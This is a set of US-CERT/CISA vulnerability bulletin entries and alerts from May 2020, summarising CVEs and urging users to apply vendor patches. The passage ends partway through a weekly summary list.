  An elevation of privilege vulnerability exists when the Windows State Repository Service improperly handles objects in memory, aka 'Windows State Repository Service Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1124, CVE-2020-1131, CVE-2020-1134, CVE-2020-1144, CVE-2020-1184, CVE-2020-1185, CVE-2020-1186, CVE-2020-1187, CVE-2020-1189, CVE-2020-1190, CVE-2020-1191. 2020-05-21 not yet calculated CVE-2020-1188
MISC microsoft -- multiple_windows_products
  A denial of service vulnerability exists in the Windows implementation of Transport Layer Security (TLS) when it improperly handles certain key exchanges, aka 'Microsoft Windows Transport Layer Security Denial of Service Vulnerability'. 2020-05-21 not yet calculated CVE-2020-1118
MISC microsoft -- multiple_windows_products
  An elevation of privilege vulnerability exists when the Windows Runtime improperly handles objects in memory, aka 'Windows Runtime Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1077, CVE-2020-1086, CVE-2020-1125, CVE-2020-1139, CVE-2020-1149, CVE-2020-1151, CVE-2020-1155, CVE-2020-1156, CVE-2020-1157, CVE-2020-1158, CVE-2020-1164. 2020-05-21 not yet calculated CVE-2020-1090
MISC microsoft -- multiple_windows_products
  A Denial Of Service vulnerability exists when Connected User Experiences and Telemetry Service fails to validate certain function values.An attacker who successfully exploited this vulnerability could deny dependent security feature functionality.To exploit this vulnerability, an attacker would have to log on to an affected system and run a specially crafted application.The security update addresses the vulnerability by correcting how the Connected User Experiences and Telemetry Service validates certain function values., aka 'Connected User Experiences and Telemetry Service Denial of Service Vulnerability'. This CVE ID is unique from CVE-2020-1123. 2020-05-21 not yet calculated CVE-2020-1084
MISC microsoft -- multiple_windows_products
  An elevation of privilege vulnerability exists in Windows Error Reporting (WER) when WER handles and executes files, aka 'Windows Error Reporting Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1021, CVE-2020-1088. 2020-05-21 not yet calculated CVE-2020-1082
MISC microsoft -- multiple_windows_products
  An information disclosure vulnerability exists when the Windows Client Server Run-Time Subsystem (CSRSS) fails to properly handle objects in memory, aka 'Windows CSRSS Information Disclosure Vulnerability'. 2020-05-21 not yet calculated CVE-2020-1116
MISC microsoft -- multiple_windows_products
  An elevation of privilege vulnerability exists when the Windows Runtime improperly handles objects in memory, aka 'Windows Runtime Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1086, CVE-2020-1090, CVE-2020-1125, CVE-2020-1139, CVE-2020-1149, CVE-2020-1151, CVE-2020-1155, CVE-2020-1156, CVE-2020-1157, CVE-2020-1158, CVE-2020-1164. 2020-05-21 not yet calculated CVE-2020-1077
MISC microsoft -- multiple_windows_products
  An elevation of privilege vulnerability exists when the Windows Runtime improperly handles objects in memory, aka 'Windows Runtime Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1077, CVE-2020-1086, CVE-2020-1090, CVE-2020-1125, CVE-2020-1139, CVE-2020-1149, CVE-2020-1151, CVE-2020-1155, CVE-2020-1156, CVE-2020-1157, CVE-2020-1158. 2020-05-21 not yet calculated CVE-2020-1164
MISC microsoft -- multiple_windows_products
  An information disclosure vulnerability exists when the Windows kernel improperly handles objects in memory, aka 'Windows Kernel Information Disclosure Vulnerability'. 2020-05-21 not yet calculated CVE-2020-1072
MISC microsoft -- multiple_windows_products
  An elevation of privilege vulnerability exists when the Windows Background Intelligent Transfer Service (BITS) IIS module improperly handles uploaded content, aka 'Windows Background Intelligent Transfer Service Elevation of Privilege Vulnerability'. 2020-05-21 not yet calculated CVE-2020-1112
MISC microsoft -- multiple_windows_products
  An elevation of privilege vulnerability exists when Windows improperly handles errors tied to Remote Access Common Dialog, aka 'Windows Remote Access Common Dialog Elevation of Privilege Vulnerability'. 2020-05-21 not yet calculated CVE-2020-1071
MISC microsoft -- multiple_windows_products
  An elevation of privilege vulnerability exists when the Windows Print Spooler service improperly allows arbitrary writing to the file system, aka 'Windows Print Spooler Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1048. 2020-05-21 not yet calculated CVE-2020-1070
MISC microsoft -- multiple_windows_products
  A cross-site-scripting (XSS) vulnerability exists when Active Directory Federation Services (ADFS) does not properly sanitize user inputs, aka 'Microsoft Active Directory Federation Services Cross-Site Scripting Vulnerability'. 2020-05-21 not yet calculated CVE-2020-1055
MISC microsoft -- multiple_windows_products
  An elevation of privilege vulnerability exists in Windows when the Windows kernel-mode driver fails to properly handle objects in memory, aka 'Win32k Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1143. 2020-05-21 not yet calculated CVE-2020-1054
MISC microsoft -- multiple_windows_products
  An elevation of privilege vulnerability exists when the Windows Print Spooler service improperly allows arbitrary writing to the file system, aka 'Windows Print Spooler Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1070. 2020-05-21 not yet calculated CVE-2020-1048
MISC microsoft -- multiple_windows_products
  A memory corruption vulnerability exists when Windows Media Foundation improperly handles objects in memory, aka 'Media Foundation Memory Corruption Vulnerability'. This CVE ID is unique from CVE-2020-1126, CVE-2020-1136, CVE-2020-1150. 2020-05-21 not yet calculated CVE-2020-1028
MISC microsoft -- multiple_windows_products
  An elevation of privilege vulnerability exists in Windows Error Reporting (WER) when WER handles and executes files, aka 'Windows Error Reporting Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1082, CVE-2020-1088. 2020-05-21 not yet calculated CVE-2020-1021
MISC microsoft -- multiple_windows_products
  An elevation of privilege vulnerability exists when the Windows State Repository Service improperly handles objects in memory, aka 'Windows State Repository Service Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1124, CVE-2020-1131, CVE-2020-1134, CVE-2020-1144, CVE-2020-1184, CVE-2020-1185, CVE-2020-1187, CVE-2020-1188, CVE-2020-1189, CVE-2020-1190, CVE-2020-1191. 2020-05-21 not yet calculated CVE-2020-1186
MISC microsoft -- multiple_windows_products
  A denial of service vulnerability exists when Hyper-V on a Windows Server fails to properly handle specially crafted network packets.To exploit the vulnerability, an attacker would send specially crafted network packets to the Hyper-V Server.The security update addresses the vulnerability by resolving the conditions where Hyper-V would fail to properly handle these network packets., aka 'Windows Hyper-V Denial of Service Vulnerability'. 2020-05-21 not yet calculated CVE-2020-0909
MISC microsoft -- multiple_windows_products
  An elevation of privilege vulnerability exists when the Windows Update Stack fails to properly handle objects in memory, aka 'Windows Update Stack Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1110. 2020-05-21 not yet calculated CVE-2020-1109
MISC microsoft -- power_bi_report_server
  A spoofing vulnerability exists in Microsoft Power BI Report Server in the way it validates the content-type of uploaded attachments, aka 'Microsoft Power BI Report Server Spoofing Vulnerability'. 2020-05-21 not yet calculated CVE-2020-1173
MISC

microsoft -- sharepoint_enterprise_server_2016_and_sharepoint_foundation_2013_service_pack

A spoofing vulnerability exists when Microsoft SharePoint Server does not properly sanitize a specially crafted web request to an affected SharePoint server, aka 'Microsoft SharePoint Spoofing Vulnerability'. This CVE ID is unique from CVE-2020-1104, CVE-2020-1107. 2020-05-21 not yet calculated CVE-2020-1105
MISC

microsoft -- sharepoint_enterprise_server_2016_and_sharepoint_server_2019

A remote code execution vulnerability exists in Microsoft SharePoint when the software fails to check the source markup of an application package, aka 'Microsoft SharePoint Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-1023, CVE-2020-1024. 2020-05-21 not yet calculated CVE-2020-1102
MISC microsoft -- visual_studio_code
  A remote code execution vulnerability exists in Visual Studio Code when the Python extension loads workspace settings from a notebook file, aka 'Visual Studio Code Python Extension Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-1171. 2020-05-21 not yet calculated CVE-2020-1192
MISC microsoft -- visual_studio_code
  A remote code execution vulnerability exists in Visual Studio Code when the Python extension loads configuration files after opening a project, aka 'Visual Studio Code Python Extension Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-1192. 2020-05-21 not yet calculated CVE-2020-1171
MISC microsoft -- windows_10_and_windows_server
  An information disclosure vulnerability exists in the way that the Windows Graphics Device Interface (GDI) handles objects in memory, allowing an attacker to retrieve information from a targeted system, aka 'Windows GDI Information Disclosure Vulnerability'. This CVE ID is unique from CVE-2020-0963, CVE-2020-1141, CVE-2020-1179. 2020-05-21 not yet calculated CVE-2020-1145
MISC microsoft -- windows_10_and_windows_server
  An elevation of privilege vulnerability exists when Windows improperly handles calls to Clipboard Service, aka 'Windows Clipboard Service Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1111, CVE-2020-1121, CVE-2020-1165. 2020-05-21 not yet calculated CVE-2020-1166
MISC microsoft -- windows_10_and_windows_server
  An elevation of privilege vulnerability exists when Windows improperly handles calls to Clipboard Service, aka 'Windows Clipboard Service Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1111, CVE-2020-1121, CVE-2020-1166. 2020-05-21 not yet calculated CVE-2020-1165
MISC microsoft -- windows_7_and_windows_server_2008_r2
  A memory corruption vulnerability exists when Windows Media Foundation improperly handles objects in memory, aka 'Media Foundation Memory Corruption Vulnerability'. This CVE ID is unique from CVE-2020-1028, CVE-2020-1126, CVE-2020-1136. 2020-05-21 not yet calculated CVE-2020-1150
MISC monstra -- monstra_cms
  Monstra CMS 3.0.4 allows remote authenticated users to upload and execute arbitrary PHP code via admin/index.php?id=filesmanager because, for example, .php filenames are blocked but .php7 filenames are not, a related issue to CVE-2017-18048. 2020-05-22 not yet calculated CVE-2020-13384
MISC mozilla -- thunderbird
  By encoding Unicode whitespace characters within the From email header, an attacker can spoof the sender email address that Thunderbird displays. This vulnerability affects Thunderbird < 68.8.0. 2020-05-22 not yet calculated CVE-2020-12397
MISC
MISC netapp -- element_os_and_element_healthtools
  Element OS prior to version 12.0 and Element HealthTools prior to version 2020.04.01.04 are susceptible to a vulnerability which when successfully exploited could lead to disclosure of sensitive information. 2020-05-21 not yet calculated CVE-2020-8572
MISC ocproducts -- composr_cms
  Composr 10.0.30 allows Persistent XSS via a Usergroup name under the Security configuration. 2020-05-22 not yet calculated CVE-2020-8789
MISC
FULLDISC puma_gem_for_ruby_on_rails -- puma_gem_for_ruby_on_rails
  In Puma (RubyGem) before 4.3.5 and 3.12.6, a client could smuggle a request through a proxy, causing the proxy to send a response back to another unknown client. If the proxy uses persistent connections and the client adds another request in via HTTP pipelining, the proxy may mistake it as the first request's body. Puma, however, would see it as two requests, and when processing the second request, send back a response that the proxy does not expect. If the proxy has reused the persistent connection to Puma to send another request for a different client, the second response from the first client will be sent to the second client. This is a similar but different vulnerability from CVE-2020-11076. The problem has been fixed in Puma 3.12.6 and Puma 4.3.5. 2020-05-22 not yet calculated CVE-2020-11077
MISC
CONFIRM puma_gem_for_ruby_on_rails -- puma_gem_for_ruby_on_rails
  In Puma (RubyGem) before 4.3.4 and 3.12.5, an attacker could smuggle an HTTP response, by using an invalid transfer-encoding header. The problem has been fixed in Puma 3.12.5 and Puma 4.3.4. 2020-05-22 not yet calculated CVE-2020-11076
MISC
MISC
CONFIRM python -- python
  An exploitable vulnerability exists in the configuration-loading functionality of the jw.util package before 2.3 for Python. When loading a configuration with FromString or FromStream with YAML, one can execute arbitrary Python code, resulting in OS command execution, because safe_load is not used. 2020-05-22 not yet calculated CVE-2020-13388
MISC schedmd -- slurm
  Slurm 19.05.x before 19.05.7 and 20.02.x before 20.02.3, in the rare case where Message Aggregation is enabled, allows Authentication Bypass via an Alternate Path or Channel. A race condition allows a user to launch a process as an arbitrary user. 2020-05-21 not yet calculated CVE-2020-12693
CONFIRM
CONFIRM splashtop -- streamer_and_business
  A Windows privilege change issue was discovered in Splashtop Software Updater before 1.5.6.16. Insecure permissions on the configuration file and named pipe allow for local privilege escalation to NT AUTHORITY/SYSTEM, by forcing a permission change to any Splashtop files and directories, with resultant DLL hijacking. This product is bundled with Splashtop Streamer (before 3.3.8.0) and Splashtop Business (before 3.3.8.0). 2020-05-21 not yet calculated CVE-2020-12431
MISC
MISC tenda -- multiple_routers
  An issue was discovered on Tenda AC6 V1.0 V15.03.05.19_multi_TD01, AC9 V1.0 V15.03.05.19(6318)_CN, AC9 V3.0 V15.03.06.42_multi, AC15 V1.0 V15.03.05.19_multi_TD01, and AC18 V15.03.05.19(6318_)_CN devices. There is a buffer overflow vulnerability in the router's web server -- httpd. While processing the /goform/addressNat entrys and mitInterface parameters for a POST request, a value is directly used in a sprintf to a local variable placed on the stack, which overwrites the return address of a function. An attacker can construct a payload to carry out arbitrary code execution attacks. 2020-05-22 not yet calculated CVE-2020-13390
MISC tenda -- multiple_routers
  An issue was discovered on Tenda AC6 V1.0 V15.03.05.19_multi_TD01, AC9 V1.0 V15.03.05.19(6318)_CN, AC9 V3.0 V15.03.06.42_multi, AC15 V1.0 V15.03.05.19_multi_TD01, and AC18 V15.03.05.19(6318_)_CN devices. There is a buffer overflow vulnerability in the router's web server -- httpd. While processing the /goform/SetSpeedWan speed_dir parameter for a POST request, a value is directly used in a sprintf to a local variable placed on the stack, which overwrites the return address of a function. An attacker can construct a payload to carry out arbitrary code execution attacks. 2020-05-22 not yet calculated CVE-2020-13391
MISC tenda -- multiple_routers
  An issue was discovered on Tenda AC6 V1.0 V15.03.05.19_multi_TD01, AC9 V1.0 V15.03.05.19(6318)_CN, AC9 V3.0 V15.03.06.42_multi, AC15 V1.0 V15.03.05.19_multi_TD01, and AC18 V15.03.05.19(6318_)_CN devices. There is a buffer overflow vulnerability in the router's web server -- httpd. While processing the /goform/openSchedWifi schedStartTime and schedEndTime parameters for a POST request, a value is directly used in a strcpy to a local variable placed on the stack, which overwrites the return address of a function. An attacker can construct a payload to carry out arbitrary code execution attacks. 2020-05-22 not yet calculated CVE-2020-13389
MISC tenda -- multiple_routers
  An issue was discovered on Tenda AC6 V1.0 V15.03.05.19_multi_TD01, AC9 V1.0 V15.03.05.19(6318)_CN, AC9 V3.0 V15.03.06.42_multi, AC15 V1.0 V15.03.05.19_multi_TD01, and AC18 V15.03.05.19(6318_)_CN devices. There is a buffer overflow vulnerability in the router's web server -- httpd. While processing the /goform/SetNetControlList list parameter for a POST request, a value is directly used in a strcpy to a local variable placed on the stack, which overwrites the return address of a function. An attacker can construct a payload to carry out arbitrary code execution attacks. 2020-05-22 not yet calculated CVE-2020-13394
MISC tenda -- multiple_routers
  An issue was discovered on Tenda AC6 V1.0 V15.03.05.19_multi_TD01, AC9 V1.0 V15.03.05.19(6318)_CN, AC9 V3.0 V15.03.06.42_multi, AC15 V1.0 V15.03.05.19_multi_TD01, and AC18 V15.03.05.19(6318_)_CN devices. There is a buffer overflow vulnerability in the router's web server -- httpd. While processing the /goform/saveParentControlInfo deviceId and time parameters for a POST request, a value is directly used in a strcpy to a local variable placed on the stack, which overwrites the return address of a function. An attacker can construct a payload to carry out arbitrary code execution attacks. 2020-05-22 not yet calculated CVE-2020-13393
MISC tenda -- multiple_routers
  An issue was discovered on Tenda AC6 V1.0 V15.03.05.19_multi_TD01, AC9 V1.0 V15.03.05.19(6318)_CN, AC9 V3.0 V15.03.06.42_multi, AC15 V1.0 V15.03.05.19_multi_TD01, and AC18 V15.03.05.19(6318_)_CN devices. There is a buffer overflow vulnerability in the router's web server -- httpd. While processing the /goform/setcfm funcpara1 parameter for a POST request, a value is directly used in a sprintf to a local variable placed on the stack, which overwrites the return address of a function. An attacker can construct a payload to carry out arbitrary code execution attacks. 2020-05-22 not yet calculated CVE-2020-13392
MISC trackr -- trackr_devices
  TrackR devices through 2020-05-06 allow attackers to trigger the Beep (aka alarm) feature, which will eventually cause a denial of service when battery capacity is exhausted. 2020-05-23 not yet calculated CVE-2020-13425
MISC Back to top

This product is provided subject to this Notification and this Privacy & Use policy.

Categories: LATEST ALERT

Microsoft Releases Security Update for Edge

US-CERT All NCAS Products - Fri, 05/22/2020 - 14:10
Original release date: May 22, 2020

Microsoft has released a security update to address a vulnerability in Edge (Chromium-based). A remote attacker could exploit this vulnerability to write files to arbitrary locations and gain elevated privileges.

The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review Microsoft’s Security Advisory for CVE-2020-1195 and apply the necessary update.

This product is provided subject to this Notification and this Privacy & Use policy.

Categories: LATEST ALERT

Cisco Releases Security Updates

US-CERT All NCAS Products - Fri, 05/22/2020 - 14:05
Original release date: May 22, 2020

Cisco has released security updates to address vulnerabilities in Unified CCX software and Prime Network Registrar. A remote attacker could exploit one of these vulnerabilities to take control of an affected system.

The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review the following Cisco advisories and apply the necessary updates:

For updates addressing lower severity vulnerabilities see the Cisco Security Advisories page.

This product is provided subject to this Notification and this Privacy & Use policy.

Categories: LATEST ALERT

ACSC Releases Cyber Criminal and APT Tradecraft Trends for 2019-2020

US-CERT All NCAS Products - Fri, 05/22/2020 - 14:04
Original release date: May 22, 2020

The Australian Cyber Security Centre (ACSC) has released a summary of trends for 2019-2020 outlining tactics, techniques, and procedures (TTPs) used by cyber criminals and advanced persistent threat (APT) groups to target Australian networks. ACSC uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK®) framework to identify notable adversary TTPs.  

The Cybersecurity and Infrastructure Security Agency (CISA) encourages administrators to review ACSC’s Summary of Tradecraft Trends for 2019-20: Tactics, Techniques and Procedures Used to Target Australian Networks and MITRE’s ATT&CK for Enterprise framework for more information.

This product is provided subject to this Notification and this Privacy & Use policy.

Categories: LATEST ALERT

CISA, DOE, and UK’s NCSC Issue Guidance on Protecting Industrial Control Systems

US-CERT All NCAS Products - Fri, 05/22/2020 - 13:08
Original release date: May 22, 2020

The Cybersecurity and Infrastructure Security Agency (CISA), the Department of Energy (DOE), and the UK's National Cyber Security Centre (NCSC) have released Cybersecurity Best Practices for Industrial Control Systems, an infographic providing recommended cybersecurity practices for industrial control systems (ICS). The two-page infographic summarizes common ICS risk considerations, short- and long-term cybersecurity event impacts, best practices to defend ICS processes, and highlights NCSC's product on Secure Design Principles and Operational Technology.

CISA, DOE, and NCSC encourage users to review Cybersecurity Best Practices for Industrial Control Systems. For more in-depth information, visit CISA’s ICS Recommended Practices webpage and DOE's Cybersecurity Capability Maturity Model (C2M2) Program webpage. For information on CISA Assessments, visit https://www.cisa.gov/cyber-resource-hub.

This product is provided subject to this Notification and this Privacy & Use policy.

Categories: LATEST ALERT

Drupal Releases Security Updates

US-CERT All NCAS Products - Thu, 05/21/2020 - 14:16
Original release date: May 21, 2020

Drupal has released security updates to address vulnerabilities affecting Drupal 7, 8.7, and 8.8. A remote attacker could exploit one of these vulnerabilities to take control of an affected system.

The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review Drupal Advisories SA-CORE-2020-002 and SA-CORE-2020-003 for more information and to apply the necessary updates.

This product is provided subject to this Notification and this Privacy & Use policy.

Categories: LATEST ALERT

Apple Releases Security Update for Xcode

US-CERT All NCAS Products - Thu, 05/21/2020 - 14:14
Original release date: May 21, 2020

Apple has released a security update to address a vulnerability in Xcode. A remote attacker could exploit this vulnerability to take control of an affected system.

The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review the Apple security page for Xcode 11.5 and apply the necessary update.

This product is provided subject to this Notification and this Privacy & Use policy.

Categories: LATEST ALERT

CISA, IRS, USSS, and Treasury Release Joint Alert on Scams Related to Coronavirus Economic Impact Payments

US-CERT All NCAS Products - Thu, 05/21/2020 - 14:11
Original release date: May 21, 2020

The Cybersecurity and Infrastructure Security Agency (CISA), U.S. Department of the Treasury, Internal Revenue Service (IRS), and United States Secret Service (USSS) have released a Joint Alert with mitigations to help Americans avoid scams related to coronavirus economic impact payments—particularly attempts to steal payments, personal and financial information, and disrupt payment efforts.

CISA encourages consumers to review the Joint Alert, Avoid Scams Related to Economic Payments, COVID-19, and www.cisa.gov/coronavirus for more information.

This product is provided subject to this Notification and this Privacy & Use policy.

Categories: LATEST ALERT

ISC Releases Security Advisory for BIND

US-CERT All NCAS Products - Wed, 05/20/2020 - 14:52
Original release date: May 20, 2020

The Internet Systems Consortium (ISC) has released security advisories that addresses vulnerabilities affecting multiple versions of ISC Berkeley Internet Name Domain (BIND). A remote attacker could exploit these vulnerabilities to cause a denial-of-service condition.

The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review the ISC advisories for CVE-2020-8616 and CVE-2020-8617 for more information and to apply the necessary updates.

This product is provided subject to this Notification and this Privacy & Use policy.

Categories: LATEST ALERT

Adobe Releases Security Updates

US-CERT All NCAS Products - Wed, 05/20/2020 - 14:49
Original release date: May 20, 2020

Adobe has released security updates to address vulnerabilities in multiple products. An attacker could exploit these vulnerabilities to obtain sensitive information.

The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review the following Adobe Security Bulletins and apply the necessary updates.

This product is provided subject to this Notification and this Privacy & Use policy.

Categories: LATEST ALERT

Google Releases Security Updates for Chrome

US-CERT All NCAS Products - Wed, 05/20/2020 - 14:47
Original release date: May 20, 2020

Google has released Chrome version 83.0.4103.61 for Windows, Mac, and Linux. This version addresses vulnerabilities that an attacker could exploit to take control of an affected system.

The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review the Chrome Release Note and apply the necessary updates.

This product is provided subject to this Notification and this Privacy & Use policy.

Categories: LATEST ALERT

VMware Releases Security Update for Cloud Director

US-CERT All NCAS Products - Wed, 05/20/2020 - 14:46
Original release date: May 20, 2020

VMware has released security updates to address a vulnerability in VMware Cloud Director (formerly known as vCloud Director). A remote attacker could exploit this vulnerability to take control of an affected system.

The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review the VMware Security Advisory and apply the necessary updates or workaround.

This product is provided subject to this Notification and this Privacy & Use policy.

Categories: LATEST ALERT

Microsoft Releases Security Advisory for Windows DNS Servers

US-CERT All NCAS Products - Wed, 05/20/2020 - 14:43
Original release date: May 20, 2020

Microsoft has released a security advisory that addresses a vulnerability affecting Windows DNS Servers. An attacker could exploit this vulnerability to cause a denial-of-service condition.

The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review Microsoft Advisory ADV200009 for more information and to apply the necessary mitigation or workaround.

This product is provided subject to this Notification and this Privacy & Use policy.

Categories: LATEST ALERT

Vulnerability Summary for the Week of May 11, 2020

US-CERT All NCAS Products - Mon, 05/18/2020 - 11:39
Original release date: May 18, 2020


The CISA Weekly Vulnerability Summary Bulletin is created using information from the NIST NVD. In some cases, the vulnerabilities in the Bulletin may not yet have assigned CVSS scores. Please visit NVD for updated vulnerability entries, which include CVSS scores once they are available.

 

High Vulnerabilities Primary
Vendor -- Product Description Published CVSS Score Source & Patch Info actionpack_page-caching_gem -- actionpack_page-caching_gem
  There is a vulnerability in actionpack_page-caching gem < v1.2.1 that allows an attacker to write arbitrary files to a web server, potentially resulting in remote code execution if the attacker can write unescaped ERB to a view. 2020-05-12 7.5 CVE-2020-8159
MISC advantech -- webaccess/scada
  Advantech WebAccess Node, Version 8.4.4 and prior, Version 9.0.0. Multiple heap-based buffer overflow vulnerabilities exist caused by a lack of proper validation of the length of user-supplied data, which may allow remote code execution. 2020-05-08 7.5 CVE-2020-10638
MISC
MISC
MISC
MISC
MISC
MISC
MISC advantech -- webaccess/scada
  Advantech WebAccess Node, Version 8.4.4 and prior, Version 9.0.0. An improper validation vulnerability exists that could allow an attacker to inject specially crafted input into memory where it can be executed. 2020-05-08 7.5 CVE-2020-12022
MISC
MISC advantech -- webaccess/scada
  Advantech WebAccess Node, Version 8.4.4 and prior, Version 9.0.0. Multiple relative path traversal vulnerabilities exist that may allow a low privilege user to overwrite files outside the application’s control. 2020-05-08 7.5 CVE-2020-12006
MISC
MISC
MISC
MISC advantech -- webaccess/scada
  Advantech WebAccess Node, Version 8.4.4 and prior, Version 9.0.0. Multiple stack-based buffer overflow vulnerabilities exist caused by a lack of proper validation of the length of user-supplied data, which may allow remote code execution. 2020-05-08 7.5 CVE-2020-12002
MISC
MISC
MISC
MISC
MISC
MISC
MISC
MISC
MISC
MISC apache -- log4net
  Apache log4net before 2.0.8 does not disable XML external entities when parsing log4net configuration files. This could allow for XXE-based attacks in applications that accept arbitrary configuration files from users. 2020-05-11 7.5 CVE-2018-1285
MISC domainmod -- domainmod
  reset.php in DomainMOD 4.13.0 uses insufficient entropy for password reset requests, leading to account takeover. 2020-05-08 7.5 CVE-2020-12735
MISC freebsd -- freebsd
  In FreeBSD 12.1-STABLE before r360971, 12.1-RELEASE before p5, 11.4-STABLE before r360971, 11.4-BETA1 before p1 and 11.3-RELEASE before p9, libalias does not properly validate packet length resulting in modules causing an out of bounds read/write condition if no checking was built into the module. 2020-05-13 7.5 CVE-2020-7454
MISC
CONFIRM freebsd -- freebsd
  In FreeBSD 12.1-STABLE before r356911, and 12.1-RELEASE before p5, insufficient checking in the cryptodev module allocated the size of a kernel buffer based on a user-supplied length allowing an unprivileged process to trigger a kernel panic. 2020-05-13 7.5 CVE-2019-15880
MISC
CONFIRM freerdp -- freerdp
  libfreerdp/codec/interleaved.c in FreeRDP versions > 1.0 through 2.0.0-rc4 has an Out-of-bounds Write. 2020-05-15 7.5 CVE-2020-11524
MISC
CONFIRM
CONFIRM freerdp -- freerdp
  libfreerdp/gdi/region.c in FreeRDP versions > 1.0 through 2.0.0-rc4 has an Integer Overflow. 2020-05-15 7.5 CVE-2020-11523
MISC
CONFIRM
CONFIRM gazie -- gazie
  An issue was discovered in Gazie 7.32. A successful installation does not remove or block (or in any other way prevent use of) its own file /setup/install/setup.php, meaning that anyone can request it without authentication. This file allows arbitrary PHP file inclusion via a hidden_req POST parameter. 2020-05-11 7.5 CVE-2020-12743
CONFIRM glpi_project -- glpi
  In GLPI before 9.4.6, an attacker can execute system commands by abusing the backup functionality. Theoretically, this vulnerability can be exploited by an attacker without a valid account by using a CSRF. Due to the difficulty of the exploitation, the attack is only conceivable by an account having Maintenance privileges and the right to add WIFI networks. This is fixed in version 9.4.6. 2020-05-12 9 CVE-2020-11060
MISC
CONFIRM gnuteca -- gnuteca
  Gnuteca 3.8 allows action=main:search:simpleSearch SQL Injection via the exemplaryStatusId parameter. 2020-05-09 7.5 CVE-2020-12766
CONFIRM google -- android
  Airbrush FW's scratch memory allocator is susceptible to numeric overflow. When the overflow occurs, the next allocation could potentially return a pointer within the previous allocation's memory, which could lead to improper memory access.Product: AndroidVersions: Android kernelAndroid ID: A-135772851 2020-05-14 7.5 CVE-2020-0221
MISC google -- android
  In a2dp_aac_decoder_cleanup of a2dp_aac_decoder.cc, there is a possible invalid free due to memory corruption. This could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-9Android ID: A-148107188 2020-05-14 10 CVE-2020-0103
MISC ibm -- i2_intelligent_analysis_platform
  IBM i2 Intelligent Analyis Platform 9.2.1 could allow a remote attacker to execute arbitrary code on the system, caused by a memory corruption error. By persuading a victim to open a specially-crafted document, a remote attacker could exploit this vulnerability to execute arbitrary code on the system with the privileges of the victim or cause the application to crash. IBM X-Force ID: 176266 2020-05-14 9.3 CVE-2020-4285
XF
CONFIRM ibm -- i2_intelligent_analysis_platform
  IBM i2 Intelligent Analyis Platform 9.2.1 could allow a remote attacker to execute arbitrary code on the system, caused by a memory corruption. By persuading a victim to open a specially crafted file, a remote attacker could exploit this vulnerability to execute arbitrary code on the system or cause the application to crash. IBM X-Force ID: 180167. 2020-05-14 9.3 CVE-2020-4422
XF
CONFIRM ibm -- i2_intelligent_analysis_platform
  IBM i2 Intelligent Analyis Platform 9.2.1 could allow a remote attacker to execute arbitrary code on the system, caused by a memory corruption error. By persuading a victim to open a specially-crafted document, a remote attacker could exploit this vulnerability to execute arbitrary code on the system with the privileges of the victim or cause the application to crash. IBM X-Force ID: 176269. 2020-05-14 9.3 CVE-2020-4287
XF
CONFIRM ibm -- i2_intelligent_analysis_platform
  IBM i2 Intelligent Analyis Platform 9.2.1 could allow a remote attacker to execute arbitrary code on the system, caused by a memory corruption error. By persuading a victim to open a specially-crafted document, a remote attacker could exploit this vulnerability to execute arbitrary code on the system with the privileges of the victim or cause the application to crash. IBM X-Force ID: 176270. 2020-05-14 9.3 CVE-2020-4288
XF
CONFIRM ibm -- i2_intelligent_analysis_platform
  IBM i2 Intelligent Analyis Platform 9.2.1 could allow a remote attacker to execute arbitrary code on the system, caused by a memory corruption. By persuading a victim to open a specially crafted file, a remote attacker could exploit this vulnerability to execute arbitrary code on the system or cause the application to crash. IBM X-Force ID: 178244. 2020-05-14 9.3 CVE-2020-4343
XF
CONFIRM ibm -- i2_intelligent_analysis_platform
  IBM i2 Intelligent Analyis Platform 9.2.1 could allow a remote attacker to execute arbitrary code on the system, caused by memory corruption. By persuading a victim to open a specially-crafted document, a remote attacker could exploit this vulnerability to execute arbitrary code on the system with the privileges of the victim or cause the application to crash. IBM X-Force ID: 181721. 2020-05-14 9.3 CVE-2020-4467
XF
CONFIRM ibm -- i2_intelligent_analysis_platform
  IBM i2 Intelligent Analyis Platform 9.2.1 could allow a remote attacker to execute arbitrary code on the system, caused by memory corruption. By persuading a victim to open a specially-crafted document, a remote attacker could exploit this vulnerability to execute arbitrary code on the system with the privileges of the victim or cause the application to crash. IBM X-Force ID: 181723. 2020-05-14 9.3 CVE-2020-4468
XF
CONFIRM iproute2 -- iproute2
  iproute2 before 5.1.0 has a use-after-free in get_netnsid_from_name in ip/ipnetns.c. NOTE: security relevance may be limited to certain uses of setuid that, although not a default, are sometimes a configuration option offered to end users. Even when setuid is used, other factors (such as C library configuration) may block exploitability. 2020-05-09 7.5 CVE-2019-20795
MISC
CONFIRM lg -- multiple_mobile_devices
  An issue was discovered on LG mobile devices with Android OS 7.2, 8.0, 8.1, 9, and 10 software. Arbitrary code execution can occur via the bootloader. The LG ID is LVE-SMP-200006 (May 2020). 2020-05-11 7.5 CVE-2020-12753
CONFIRM libemf -- libemf
